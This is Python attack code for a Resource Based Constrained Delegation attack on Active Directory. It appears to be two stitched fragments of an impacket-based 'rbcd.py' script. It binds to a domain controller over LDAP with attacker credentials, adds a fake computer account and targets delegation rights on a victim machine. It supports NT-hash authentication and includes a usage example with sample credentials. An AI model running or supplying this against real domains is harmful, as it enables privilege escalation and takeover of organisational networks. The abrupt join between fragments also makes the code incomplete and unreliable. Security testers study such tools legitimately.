import ldapdomaindump from impacket import logging from impacket.examples import logger from impacket.examples.ntlmrelayx.attacks.ldapattack import LDAPAttack from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig attackeraccount = ('DOMAIN\\USER', 'PASSWORD') fakecomputer = 'FAKE_COMPUTER_NAME' targetcomputer = 'TARGET_COMPUTER_NAME' dc = 'DC_IP' targetsam = '{}$'.format(targetcomputer) fakecomputersam = '{}$'.format(fakecomputer) c = NTLMRelayxConfig() c.addcomputer = fakecomputer c.target = dc logger.init() logging.getLogger().setLevel(logging.INFO) logging.info('Starting Resource Based Constrained Delegation Attack against {}'.format(targetsam)) logging.info('Initializing LDAP connection to {}'.format(dc)) #tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2) serv = ldap3.Server(dc, tls=False, get_info=ldap3.ALL) logging.info('Using {} account with password ***'.format(attackeraccount[0])) conn = ldap3.Connection(serv, user=attackeraccount[0], password=attackeraccount[1], authentication=ldap3.SIMPLE) conn.bind() logging.info('LDAP bind OK') logging.info('Initializing domainDumper()')
help= 'domain\\username:password, attacker account with write access to target computer properties (NetBIOS domain name must be used!)' ) if len(sys.argv) == 1: parser.print_help() print( '\nExample: ./rbcd.py -dc-ip 10.10.10.1 -t WEB -f FAKECOMP ECORP\\test:Spring2020' ) sys.exit(1) options = parser.parse_args() attackeraccount = options.identity.split(':') c = NTLMRelayxConfig() c.addcomputer = options.f c.target = options.dc_ip if options.hashes: # support only :NTHASH format (no LM) attackerpassword = ("aad3b435b51404eeaad3b435b51404ee:" + options.hashes.split(":")[1]).upper() else: attackerpassword = attackeraccount[1] logger.init() logging.getLogger().setLevel(logging.INFO) logging.info( 'Starting Resource Based Constrained Delegation Attack against {}$'.format( options.t))